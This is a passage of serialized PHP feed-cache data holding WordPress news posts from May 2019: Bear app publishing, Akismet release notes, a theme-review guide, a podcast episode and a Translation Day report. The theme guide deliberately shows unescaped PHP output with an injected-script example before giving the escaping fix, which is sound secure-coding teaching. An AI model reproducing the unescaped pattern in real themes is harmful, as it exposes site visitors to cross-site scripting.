Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:28;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:64:"WPTavern: Bear App Adds WordPress Publishing Integration for iOS";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89558";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:75:"https://wptavern.com/bear-app-adds-wordpress-publishing-integration-for-ios";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3887:"<p>For several years, <a href="https://bear.app/" rel="noopener noreferrer" target="_blank">Bear App</a> users have <a href="https://wptavern.com/bear-app-users-want-wordpress-publishing-integration" rel="noopener noreferrer" target="_blank">eagerly requested the ability to publish their notes to WordPress</a>. Bear features a zen writing experience blended seamlessly with note-taking capabilities, a combination that landed the app an Apple Design Award in 2017.</p>\n<p>People use Bear for everything from taking notes to writing chapters for books. Many users also rely on the app for writing drafts for blogs they plan to publish on other platforms. This often requires multiple steps for copying and pasting content, especially when there is media or HTML included in the content.</p>\n<p>Two years ago, the app&#8217;s creators had WordPress publishing on their to-do list but it wasn&#8217;t yet a priority. They were reluctant to implement their own publishing tool with the WordPress APIs and preferred a solution that would rely on external apps. </p>\n<p>Things have changed in the past couple of years, as writing apps have more pressure to provide a frictionless connection to publishing capabilities in order to remain competitive. WordPress&#8217; market share has grown to be an estimated <a href="https://w3techs.com/technologies/details/cm-wordpress/all/all" rel="noopener noreferrer" target="_blank">33% of the the top 10 million websites</a>. In fact, Bear recently <a href="https://blog.bear.app/2019/02/our-blog-has-a-new-home-and-some-new-perks/" rel="noopener noreferrer" target="_blank">moved its blog off of Medium and over to WordPress</a> in February 2019. </p>\n<p>This week WordPress.com, maintainers of the open source WordPress mobile apps, and Bear <a href="https://blog.bear.app/2019/05/introducing-a-new-way-to-publish-bear-notes-to-wordpress-on-ipad-and-iphone/" rel="noopener noreferrer" target="_blank">announced</a> that they have collaborated on a solution that allows users to publish notes to WordPress blogs on iOS. Recent updates to both Bear and WordPress apps enable users to click the share icon on a note and see WordPress pop up as an option. The content is shared with all of its formatting, headings, lists, links, and media in tact.</p>\n<p><a href="https://cloudup.com/ciCXTmNNLfv"><img src="https://i1.wp.com/cldup.com/u5KnyhPiCg.gif?resize=400%2C710&ssl=1" alt="Bear screen recording" width="400" height="710" /></a></p>\n<p>The developers at Shiny Frog, makers of the Bear app, explained the solution they landed on for the WordPress integration:</p>\n<blockquote><p>We built an <a href="https://github.com/shinyfrog/TextBundle" rel="noopener noreferrer" target="_blank">open source library</a> for processing TextBundle files. <a href="http://textbundle.org/" rel="noopener noreferrer" target="_blank">TextBundle</a> is an open standard for sharing plain text files that include attachments like photos. WordPress then worked to add TextBundle support to its iOS app. Bear hands your note off to WordPress as a TextBundle file, and WordPress converts it into a blog post.</p></blockquote>\n<p>Using an open standard like this allows other other developers to <a href="https://github.com/shinyfrog/TextBundle" rel="noopener noreferrer" target="_blank">build on top of it</a> to create their own integrations for other platforms. It also keeps the Bear app team from having to stay up to date with all the changes to APIs of multiple platforms.</p>\n<p>The new WordPress publishing integration works with any site you have in the WordPress mobile app for iOS, including both self-hosted and WordPress.com sites. Notes must begin with an H1 tag in order to have the blog post title automatically populated. Bear App users can start publishing to WordPress immediately after updating both apps to the latest versions released this week.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 14 May 2019 20:20:13 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:29;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:71:"Akismet: Version 4.1.2 of the Akismet WordPress Plugin is Now Available";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:31:"http://blog.akismet.com/?p=2039";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:57:"https://blog.akismet.com/2019/05/14/akismet-plugin-4-1-2/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:885:"<p>Version 4.1.2 of <a href="http://wordpress.org/plugins/akismet/">the Akismet plugin for WordPress</a> is now available. It contains the following changes:</p>\n\n\n\n<ul>\n<li>We&#8217;ve reduced the number of API requests made by the plugin when attempting to verify the API key.</li>\n<li>We&#8217;re now including additional data in the pingback pre-check API request to help make stats more accurate.</li>\n<li>We fixed a bug that was enabling the &#8220;Check for Spam&#8221; button when no comments were eligible to be checked.</li>\n<li>We&#8217;ve improved Akismet&#8217;s AMP compatibility.</li>\n</ul>\n\n\n\n<p>To upgrade, visit the Updates page of your WordPress dashboard and follow the instructions. If you need to download the plugin zip file directly, links to all versions are available in <a href="http://wordpress.org/plugins/akismet/">the WordPress plugins directory</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 14 May 2019 15:06:22 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:17:"Christopher Finke";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:30;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:84:"WPTavern: The Most Common WordPress Theme Development Mistakes (and How to Fix Them)";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89605";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:93:"https://wptavern.com/the-most-common-wordpress-theme-development-mistakes-and-how-to-fix-them";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:15614:"<p>Submitting a theme to the WordPress.org theme directory is a great way to share your work and contribute to the WordPress community. Currently, there are over 7000 themes in the directory, the most popular of which exceeds <a href="https://wordpress.org/themes/oceanwp/">300,000 active installations</a>. (Not including Twenty____ Themes which are packaged with WordPress and have install counts in the millions.)</p>\n\n\n\n<p>Before submitting your theme to the directory, it’s important to understand the <a href="https://make.wordpress.org/themes/handbook/review/">review process</a> first because if your theme doesn’t meet those requirements it can be rejected on the spot.</p>\n\n\n\n<blockquote class="wp-block-quote"><p>Themes that have 3 or more distinct issues may be closed as not-approved. However, theme authors may resubmit the theme once they’ve corrected the issues.</p><cite><a href="https://make.wordpress.org/themes/handbook/review/required/">https://make.wordpress.org/themes/handbook/review/required/</a></cite></blockquote>\n\n\n\n<p>Reviewers are on your side and want to see your theme go live, once it meets the standards required. If your theme has only minor issues preventing it being included in the directory, your reviewer will work with you to fix those. </p>\n\n\n\n<p>Unfortunately, if your theme has too many issues it will be closed as not-approved. If you decide to fix the issues you can upload the theme again &#8211; but it will join the back of the queue.</p>\n\n\n\n<p>From my experience <a href="https://themes.trac.wordpress.org/query?status=closed&status=approved&owner=DannyCooper&col=id&col=summary&col=reporter&col=status&col=resolution&col=time&col=changetime&order=owner&desc=1&report=12">reviewing over 100 themes</a> I’ve been able to identify the most common issues that prevent themes being approved. By sharing these with you in this article I’m hoping I can help you avoid getting stuck in the queue or rejected.</p>\n\n\n\n<h3><strong>Uploading Your Theme</strong></h3>\n\n\n\n<p>When you upload a theme, it joins the queue to be reviewed. On average it will take two months for your theme to reach the front of the queue and receive its first review. All reviewers are volunteers with limited time available to complete reviews. A variety of factors can affect the wait time. When more people volunteer to review themes, the queue moves quickly. Conversely, when themes with a lot of issues are submitted it slows down the queue.</p>\n\n\n\n<p>By submitting a theme that meets all the requirements it makes the review process a lot smoother and ultimately your theme will be live sooner. In this guide, we are going to explore the most common issues that will keep your theme held up in the queue and prevent it from being approved.</p>\n\n\n\n<p>Note: Theme authors that have a track record of submitting issue-free themes can apply to become &#8216;<a href="https://wptavern.com/wordpress-theme-review-team-launches-trusted-authors-program">Trusted Authors</a>&#8216;.</p>\n\n\n\n<h3><strong>Naming Issues</strong></h3>\n\n\n\n<p>When you upload a theme, the first check that is performed is to see if the name is already taken. Frequently you will be told the name you&#8217;ve chosen is already taken, even if you can&#8217;t see a theme with that name in the directory. </p>\n\n\n\n<p>How could that be? The reason is that the test isn&#8217;t checking against just the directory, it&#8217;s checking against the entire WordPress ecosystem. If a theme has been released anywhere (Github, ThemeForest, etc.) and has over 50 active installations, that name will be unavailable to use.</p>\n\n\n\n<p>Note: if you&#8217;ve released your theme elsewhere and accumulated 50+ installations, you can still use that name in the directory.</p>\n\n\n\n<h3><strong>Unescaped Output</strong></h3>\n\n\n\n<p>Theme reviewers take security <strong>very</strong> seriously, there&#8217;s even a <a href="https://developer.wordpress.org/themes/theme-security/">dedicated resource</a>. An entire article could be written on writing secure themes, but in this section we are going to explore one aspect: escaping output.</p>\n\n\n\n<p>Unescaped output places users of your theme at risk. Here’s an example of an unescaped value ($title):</p>\n\n\n<pre class="brush: xml; title: ; notranslate">\n$title = get_option( ''my_custom_title'' );\necho ''&lt;h2&gt;'' . $title . ''&lt;/h2&gt;'';\n</pre>\n\n\n<p>The problem with the above is that while we know what type of value $title <strong>should</strong> be, a string, we have not checked if that is the case.</p>\n\n\n\n<p>If a hacker has managed to change the value of &#8216;my_custom_title&#8217; in the database, your theme will output that value. This presents a huge risk as they could replace the intended output with inline Javascript:</p>\n\n\n<pre class="brush: jscript; title: ; notranslate">\n    alert(''This is dangerous''); \n\n</pre>\n\n\n<p>The solution is to escape all output to ensure it only includes the type of data we are expecting.</p>\n\n\n\n<p>Our example could be fixed like this:</p>\n\n\n<pre class="brush: php; title: ; notranslate">\n$title = get_option( ''my_custom_title'' );\necho ''&lt;h2&gt;'' . esc_html( $title ) . ''&lt;/h2&gt;'';\n</pre>\n\n\n<p>The downside to using esc_html is that it strips all HTML tags. If $title included bold or italics, for example:</p>\n\n\n<pre class="brush: php; title: ; notranslate">\n$title = ''This article is &lt;strong&gt;very&lt;/strong&gt; useful'';\necho esc_html( $title );\n</pre>\n\n\n<p>The word &#8216;very&#8217; would not be bold on the frontend; instead it would output the code &lt;strong&gt;very&lt;/strong&gt;.</p>\n\n\n\n<p>This illustrates why it&#8217;s important to use the correct escaping functions for the context. If we were expecting some HTML in the output, we&#8217;d be better using wp_kses_post() or wp_kses() and setting the $allowed_html parameter.</p>\n\n\n\n<p>Functions that output also need to be escaped:</p>\n\n\n<pre class="brush: plain; title: ; notranslate">\n&lt;a href="&lt;?php echo esc_url( get_permalink() ); ?&gt;"&gt;\n</pre>\n\n\n<p>The exception is WordPress core functions that include &#8216;the_&#8217; in their name, these are usually escaped already.</p>\n\n\n<pre class="brush: php; title: ; notranslate">\nfunction the_permalink( $post = 0 ) {\n    /**\n     * Filters the display of the permalink for the current post.\n     *\n     * @since 1.5.0\n     * @since 4.4.0 Added the `$post` parameter.\n     *\n     * @param string      $permalink The permalink for the current post.\n     * @param int|WP_Post $post      Post ID, WP_Post object, or 0. Default 0.\n     */\n    echo esc_url( apply_filters( ''the_permalink'', get_permalink( $post ), $post ) );\n}\n</pre>\n\n\n<h3><strong>Untranslatable Text</strong></h3>\n\n\n\n<p>To be accepted into the directory all themes must be 100% &#8216;translation-ready&#8217;. That means each text string your theme outputs must be translatable. </p>\n\n\n\n<p>WordPress already has the systems and functionality to handle the translation process, you just need to make sure your strings use the correct functions.</p>\n\n\n\n<p>While simple to implement, this is often overlooked as it goes against the flow of how people write HTML.</p>\n\n\n\n<p>Normally, you might do something like this:</p>\n\n\n<pre class="brush: php; title: ; notranslate">\n&lt;h1&gt;404 - Not Found&lt;/h1&gt;\n</pre>\n\n\n<p>To make it translatable, you need to add in some PHP:</p>\n\n\n<pre class="brush: php; title: ; notranslate">\n// __ functions are the basis of localization.\n&lt;h1&gt;&lt;?php echo __( ''404'', ''text-domain'' ); ?&gt;\n\n// _e functions echo the value.\n&lt;h1&gt;&lt;?php _e( ''404'', ''text-domain'' ); ?&gt;\n\n// Escape and echo the string.\n&lt;h1&gt;&lt;?php esc_html_e( ''404'', ''text-domain'' ); ?&gt;\n\n// localization and variables.\n&lt;h1&gt;&lt;?php _n( ''One post'', ''%s posts'', $count, ''text-domain'' ); ?&gt;\n</pre>\n\n\n<p>Strings output by functions must also be translation ready:</p>\n\n\n<pre class="brush: php; title: ; notranslate">\n// not translation-ready :-(\n&lt;?php next_posts_link( ''Older Entries'' ); ?&gt;\n\n// translation-ready :-)\n&lt;?php next_posts_link( esc_html__( ''Older Entries'', ‘text-domain’ ) ); ?&gt;\n</pre>\n\n\n<p>Tip: A lot of code examples in codex.wordpress.org don&#8217;t use the translation functions, so be careful when copy and pasting those.</p>\n\n\n\n<h3><strong>Incorrectly Enqueuing Resources</strong></h3>\n\n\n\n<p>The .css and .js files your theme uses must be enqueued using the correct functions: wp_enqueue_style() for CSS and wp_enqueue_script() for Javascript.</p>\n\n\n\n<p>A common error is to hardcode scripts and styles directly into the &lt;head&gt; or before &lt;/body&gt;. There are two problems to this approach:</p>\n\n\n\n<p><strong>1. Impossible to remove</strong></p>\n\n\n\n<p>If a plugin needs to remove a resource you have loaded, it’s not possible. If you had used the proper enqueue functions it could be done like so:</p>\n\n\n<pre class="brush: php; title: ; notranslate">\n/**\n * Dequeue the theme javascript.\n *\n * Hooked to the wp_enqueue_scripts action, with a late priority (100),\n * so that it is after the script was enqueued.\n */\nfunction wptavern_dequeue_script() {\n   wp_dequeue_script( ''theme-scripts'' );\n}\nadd_action( ''wp_enqueue_scripts'', ''wptavern_dequeue_script'', 100 );\n</pre>\n\n\n<p><strong>2. Duplicate Loading</strong></p>\n\n\n\n<p>If you enqueue a resource, jQuery for example, and a plugin also enqueues it, WordPress is smart enough to only load it once.</p>\n\n\n<pre class="brush: php; title: ; notranslate">\n/**\n * Enqueue jQuery\n *\n * jQuery will only be loaded once, despite the two enqueues.\n * jQuery is packaged with WordPress so we don''t need to specify a src. \n */\nfunction wptavern_enqueue_script() {\n   wp_enqueue_script( ''jquery'' );\n   wp_enqueue_script( ''jquery'' );\n}\nadd_action( ''wp_enqueue_scripts'', ''wptavern_enqueue_script'' );\n</pre>\n\n\n<p>If instead you had hardcoded jQuery into your &lt;head&gt; then there would be no way for WordPress to know, and it would be loaded twice.</p>\n\n\n\n<h3><strong>Plugin-Territory Functionality</strong></h3>\n\n\n\n<p>The scope of a theme should only handle the design and aesthetic of a website, all other functionality should be handled by WordPress itself or plugins.</p>\n\n\n\n<p>In an attempt to add more value to their themes, theme authors often try to incorporate extra functionality, for example, SEO controls or custom post types.</p>\n\n\n\n<p>The problem with bundling functionality into a theme is that the data is not portable. Take SEO controls as an example, if the user changes the theme, they lose all the work they did to optimize their pages. In contrast by using an SEO plugin, the data and functionality is independent of the theme and will be retained when changing the theme.</p>\n\n\n\n<p>Some examples of plugin-territory functionality:</p>\n\n\n\n<ul><li>Analytics/Tracking</li><li>SEO controls</li><li>Contact Forms</li><li>Shortcodes</li><li>Gutenberg Blocks</li></ul>\n\n\n\n<p>Tip: If your code writes to the database, it is highly likely to be plugin territory. The exception would be design-related settings (sidebar position, colors, etc.).</p>\n\n\n\n<h3><strong>Not Prefixing</strong></h3>\n\n\n\n<p>Prefixing is a way of ensuring that your code doesn&#8217;t clash with code from plugins. Namespacing in PHP is a better way to achieve the same effect. However, some users are still using old versions of PHP (5.2) which don&#8217;t support that feature.</p>\n\n\n\n<p>Justin Tadlock shared a list of common things that should be prefixed:</p>\n\n\n\n<ul><li>PHP function names.</li><li>PHP class names.</li><li>PHP global variables.</li><li>Action/Filter hooks.</li><li>Script handles.</li><li>Style handles.</li><li>Image size names.</li></ul>\n\n\n\n<p>Source: <a href="https://themereview.co/prefix-all-the-things/">https://themereview.co/prefix-all-the-things/</a></p>\n\n\n<pre class="brush: php; title: ; notranslate">\n// function example.\nmy_prefix_example();\n\n// class example.\nclass My_Prefix_Example { … }\n\n// action and filter example.\ndo_action( ''my_prefix_action'' );\napply_filters( ''my_prefix_filter'', $values );\n\n// enqueue examples.\nwp_enqueue_script( ''my_prefix_script'', get_template_directory_uri() . ''/js/custom-script.js'' );\nwp_enqueue_style( ''my_prefix_style'', get_template_directory_uri() . ''/css/styles.css'' );\n\n// image size example.\nadd_image_size( ''my_prefix_image_size'', 220, 180 ); // 220 pixels wide by 180 pixels tall.\n</pre>\n\n\n<p>Exception: When enqueuing third-party resources, don’t add a prefix:</p>\n\n\n<pre class="brush: jscript; title: ; notranslate">\n // enqueuing a third-party script (chosen.js).\n wp_enqueue_script( ''chosen'', get_template_directory_uri() . ''/js/chosen.js'' );\n</pre>\n\n\n<h3><strong>Licensing Issues</strong></h3>\n\n\n\n<p>Your theme and all of its files must be 100% GPL-compatible. This includes images, libraries, scripts, and fonts.</p>\n\n\n\n<p>All third-party resources must list their source and license information.</p>\n\n\n\n<p>This requirement can be particularly tricky as not all licenses are GPL-friendly. The Unsplash license only has one restriction:</p>\n\n\n\n<p>“This license does not include the right to compile photos from Unsplash to replicate a similar or competing service.”</p>\n\n\n\n<p>That one restriction, however, is enough to make it non-GPL-compatible, and as such, you won&#8217;t see Unsplash images included in wordpress.org themes.</p>\n\n\n\n<p>A list of GPL-compatible licenses is available here &#8211; <a href="https://www.gnu.org/licenses/license-list.html#GPLCompatibleLicenses">https://www.gnu.org/licenses/license-list.html#GPLCompatibleLicenses</a></p>\n\n\n\n<p>Recently,<strong> </strong><a href="https://stocksnap.io/">stocksnap.io</a> has been the most common source of images in the directory as <strong>all </strong>the images they list are licensed as CC0 (GPL-compatible).</p>\n\n\n\n<h3><strong>Screenshot Mistakes</strong></h3>\n\n\n\n<p>The requirements state that your screenshot should be an unedited representation of your theme that doesn&#8217;t look like an advertisement. That means no photoshop work, overlays, borders or fancy effects.</p>\n\n\n\n<p>Images must also follow the same licensing requirements we explored above.</p>\n\n\n\n<img src="https://lh3.googleusercontent.com/42HUG_N4a7-I4LHNiJzeD9iI_rVCXD0_lb3UZEiaM18zJ0giqX479QUj9Dl35j2BQObf2DHaiQ7cgvoznWclzEcNo2HuwwGgsJ5eNjFW9vZvuzuBn7gev3wRuBz6SNC1XGMwoo4M" alt="" />theme pictured: <a href="https://wordpress.org/themes/blocksy/">Blocksy</a>\n\n\n\n<h3><strong>Bonus: Use a Coding Standard</strong></h3>\n\n\n\n<p>Code that seems easy to read and understand for you, can be the complete opposite for a reviewer who only has 10-15 minutes to check your code.</p>\n\n\n\n<p>While there is no requirement on coding standards, following one does make your code easier to read, understand and maintain. I personally use and recommend the &#8216;<a href="https://make.wordpress.org/core/handbook/best-practices/coding-standards/php/">WordPress Coding Standards</a>&#8216;, though there are others.</p>\n\n\n\n<p>Using PHP_CodeSniffer and the WordPress ruleset in your code editor can make adhering to a standard a lot easier &#8211; <a href="https://github.com/WordPress-Coding-Standards/WordPress-Coding-Standards">https://github.com/WordPress-Coding-Standards/WordPress-Coding-Standards</a></p>\n\n\n\n<h3><strong>Conclusion</strong></h3>\n\n\n\n<p>The Theme Requirements are created with the end user in mind. Avoid making the common mistakes I&#8217;ve listed above and your theme will be approved in no time. If you would like to experience the review process from the other side, you can even <a href="https://make.wordpress.org/themes/handbook/get-involved/become-a-reviewer/">become a reviewer</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 14 May 2019 14:56:58 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:12:"Danny Cooper";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:31;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:39:"WPTavern: Pressing Topics – Episode 1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89592";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:46:"https://wptavern.com/pressing-topics-episode-1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3178:"<p>Pressing Topics is a daily podcast hosted by <a href="https://www.presstitan.com/">Malcolm Peralty</a> and myself. We discuss the news that&#8217;s making headlines in the WordPress ecosystem as well as related topics that catch our eyes. Generally speaking, if you listen to this show on a daily basis, you should have a good idea on what&#8217;s going on in the WordPress community.</p>\n\n\n\n<p>Pressing Topics is different from WordPress Weekly as we&#8217;ll rarely interview guests, go in-depth on specific subjects, and the show&#8217;s length is greatly reduced. Today&#8217;s episode is 26 minutes long and most episodes will be shorter than that. </p>\n\n\n\n<p>In our first episode, we discuss the balancing act of user self sufficiency, a new empowerwoment project at Yoast, why countdown timers on event sites are impractical, and WPMU Dev ending development for more than 90% of their plugins. </p>\n\n\n\n<p>We also talk about the success of WordPress Translation day 4, and inform listeners of multiple security vulnerabilities discovered in the WordPress Ultimate Member plugin. </p>\n\n\n\n<p>I&#8217;ll submit the podcast to iTunes in the next few days to provide more convenient options of subscribing. Please listen to episode one and let us know what you think. </p>\n\n\n\n<h2>Stories Discussed:</h2>\n\n\n\n<p> <a href="https://torquemag.io/2019/05/encourage-self-sufficiency/">User Self Sufficiency</a> </p>\n\n\n\n<p><a href="https://twitter.com/yoast/status/1127903355815309314">Empowerwoment project at Yoast</a> </p>\n\n\n\n<p><a href="https://twitter.com/venikunche/status/1128032888556019712">Conference Websites &#8211; Please don&#8217;t use countdown timers </a></p>\n\n\n\n<p><a href="https://premium.wpmudev.org/blog/wpmu-dev-legacy-plugins/">WPMUDEV Shutting Down Development on Many Plugins </a></p>\n\n\n\n<p><a href="https://wpultimo.com/2019/05/10/hey-there-pro-sites-user/">WPMU Pro Sites Plugin Migration Option with WP Ultimo</a></p>\n\n\n\n<p><a href="https://wptavern.com/wordpress-translation-day-4-successfully-hosts-77-local-events-in-35-countries-recruits-183-new-translators">WordPress Translation Day 4 Successfully Hosts 77 Local Events in 35 Countries, Recruits 183 New Translators</a></p>\n\n\n\n<p><a href="https://blog.sucuri.net/2019/05/multiple-vulnerabilities-in-the-wordpress-ultimate-member-plugin.html">Multiple Vulnerabilities in the WordPress Ultimate Member Plugin </a></p>\n\n\n\n<p>The transcript is in Rich-Text format. You can download the show or listen to it via the embedded audio player below. </p>\n\n\n\n<div class="wp-block-file"><a href="https://wptavern.com/wp-content/uploads/2019/05/EPISODE-1-Pressing-Topics-Transcript.rtf">EPISODE 1 &#8211; Pressing Topics Transcript</a><a href="https://wptavern.com/wp-content/uploads/2019/05/EPISODE-1-Pressing-Topics-Transcript.rtf" class="wp-block-file__button">Download</a></div>\n\n\n\n<div class="wp-block-file"><a href="https://wptavern.com/wp-content/uploads/2019/05/EPISODE-1-Pressing-Topics.mp3">Pressing Topics Episode 1</a><a href="https://wptavern.com/wp-content/uploads/2019/05/EPISODE-1-Pressing-Topics.mp3" class="wp-block-file__button">Download</a></div>\n\n\n\nListen to Pressing Topics Episode 1<br />";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 14 May 2019 08:24:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:32;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:118:"WPTavern: WordPress Translation Day 4 Successfully Hosts 77 Local Events in 35 Countries, Recruits 183 New Translators";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89550";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:128:"https://wptavern.com/wordpress-translation-day-4-successfully-hosts-77-local-events-in-35-countries-recruits-183-new-translators";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:12751:"<p><a href="https://wptranslationday.org/" rel="noopener noreferrer" target="_blank">WordPress Translation Day 4</a> was held over the weekend. The 24-hour global event hosted 77 local events in 35 countries and the Polyglots team added 183 new contributors to their ranks. The team also designated 12 new GTEs (Global Translation Editor) and 14 PTEs (Project Translation Editor).</p>\n<p>Naoko Takano, a Polyglots Team Global Mentor and Japanese GTE, gave an <a href="https://www.slideshare.net/naokomc/introduction-to-wordpress-translation-day-4-144893265" rel="noopener noreferrer" target="_blank">introduction</a> to the event from Tokyo for the livestream. In her presentation she shared some stats on the state of WordPress translation. WordPress is currently available in 201 locales with 614 GTEs, 3,086 PTEs, and 32,585 contributors. The majority of WordPress installs are in locales other than US English, representing an estimated 18% of the web.</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2019/05/Screen-Shot-2019-05-13-at-2.24.45-PM.png?ssl=1"><img /></a></p>\n<p>Takano also highlighted the top locales installed:</p>\n<ul>\n<li>Japanese: 5.9%</li>\n<li>German: 5.5%</li>\n<li>Spanish: 5.0%</li>\n<li>French: 3.8%</li>\n<li>English (UK): 3.7%</li>\n</ul>\n<p>Locales with most translation contributors include Spanish (2,863), German (2,399), Italian (2,190), Dutch (1,584), and Russian (1,515). These stats show that WordPress still has tremendous opportunity for growth among top world languages with the most native speakers, such as Chinese dialects, Hindi, Aarabic, Bengali, and Portugese.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">We are translating WordPress into Persian in Iran <img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f1ee-1f1f7.png" alt="🇮🇷" class="wp-smiley" /> on <a 